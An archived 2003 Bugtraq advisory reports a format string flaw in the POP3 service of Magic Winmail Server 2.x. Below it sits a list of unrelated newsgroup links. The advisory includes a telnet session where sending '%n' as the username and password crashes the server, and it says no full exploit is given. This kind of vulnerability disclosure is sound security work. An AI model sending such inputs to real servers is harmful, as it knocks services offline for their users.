Magic Winmail Server v.2.*: format string

From: D4rkGr3y (grey_1999_at_mail.ru)
Date: 05/25/03

  • Next message: Gyrniff: "iisPROTECT SQL injection in admin interface" 
    Date: Sat, 24 May 2003 15:33:53 -0700
To: bugtraq@security.nnov.ru, bugtraq@securityfocus.com

    -----BEGIN PGP SIGNED MESSAGE-----

    ################################################################*
    # Damage Hacking Group security advisory
    # www.dhgroup.org
    ################################################################*
    #Product: Magic Winmail Server
    #Auth: AMAX Information Technologies Inc. [www.magicwinmail.net]
    #Vulnerable versions: v.2.* (founded in 2.3)
    #Vulnerability: format string
    ################################################################*

    #Overview#------------------------------------------------------#
    Magic Winmail Server is a professional and easy-use mail server
    software, supporting SMTP,POP3,WebMail,anti-virus,multiple
    domains,SMTP authentication,remote control, spam filter,user
    and domain alias, quotas, mail group, mail route. Magic Winmail
    can serve not only as LAN mail server, Internet Mail server,
    but also as mail server or gateway switching in with ISDN, xDSL,
    Cable Modem.

    #Problem#-------------------------------------------------------#
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\>telnet 127.0.0.1 110
    +OK alpha Magic Winmail Server 2.3(Build 0402) POP3 ready
    user %s
    +OK
    pass %s
    - -ERR authorization failed

    Connection to host lost.

    C:\>type Progra~1\magicw~1\server\logs\pop3.log
    2105/Y-19:48:50 2716 Connect from 127.0.0.1
    2105/Y-19:48:57 1336 ?-???? not exist

    C:\> ^^^^^^
                             %s
    #########now let's kill it

    C:\>telnet 127.0.0.1 110
    +OK alpha Magic Winmail Server 2.3(Build 0402) POP3 ready
    user %n
    +OK
    pass %n
    - -ERR authorization failed

    Connection to host lost.

    C:\>telnet 127.0.0.1 110
    Connecting To 127.0.0.1...Could not open connection to the host,
    on port 110. No connection could be made because the target
    machine actively refused it.

    C:\>

    #Exploit#--------------------------------------------------------#
    none

    #wow#------------------------------------------------------------#
    %$#@ www.dhgroup.org -=> opened English version! Come on in :)

    #eof

    Best regards www.dhgroup.org
      D4rkGr3y icq 540981

    -----BEGIN PGP SIGNATURE-----
    Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

    iQCVAwUBPs/zS24LIpseSJmPAQGSPQP+Lu8vaa7UhQG09Wx3hGHsugm6dLR25jwM
    kiEdg8pWuX5iMeloFVm91mjyuw5jrWpT1khNbdntZcyQ3Xxs9I/v4szYH/Lfh/fP
    GUoE0Ek3aM2oxmpktisB9g/KFoMmOhSskv0AEOwTKEVMPCRS8GWZrrbJERfDcevY
    f55hQN4jzSA=
    =t1jb
    -----END PGP SIGNATURE-----

  • Next message: Gyrniff: "iisPROTECT SQL injection in admin interface"

    Relevant Pages

    • Re: LifeDrive Frustrations
      ... hot-sync & have now got back my contacts & calandar info - after many, ... then "network" to add ISP basic connection details for use ... mail server and pop3 account details. ... me an instruction to Hot-Sync!! ...
      (uk.comp.sys.palmtops)
    • Re: LifeDrive Frustrations
      ... OK so it seems basic functions are working. ... > detecting an existing Email Account (this last one is grayed out & is ... then "network" to add ISP basic connection details for use ... mail server and pop3 account details. ...
      (uk.comp.sys.palmtops)
    • Re: Sendmail Hacked
      ... My linux box is running Linux 8 and has all of the latest ... I've also got an active connection ... Fourth, the kids sit at different computers every class, ... so I need a good HTML mail server. ...
      (comp.os.linux.security)
    • Advanced network uprade q
      ... Service B directly feeds the mail server & nothing else (ethernet socket ... Plug the 2nd ethernet socket out the MP into the local network, ... local connection, half the new upload speed is lost to people who could ... I'm mainly after improved upload speeds here, ...
      (uk.comp.sys.mac)
    • oe6
      ... Subject: Mail Server Connection ... >>> Until this morning I have had no problem connecting to the Earthlink ... Now I keep getting the following error message: ...
      (microsoft.public.windows.inetexplorer.ie6_outlookexpress)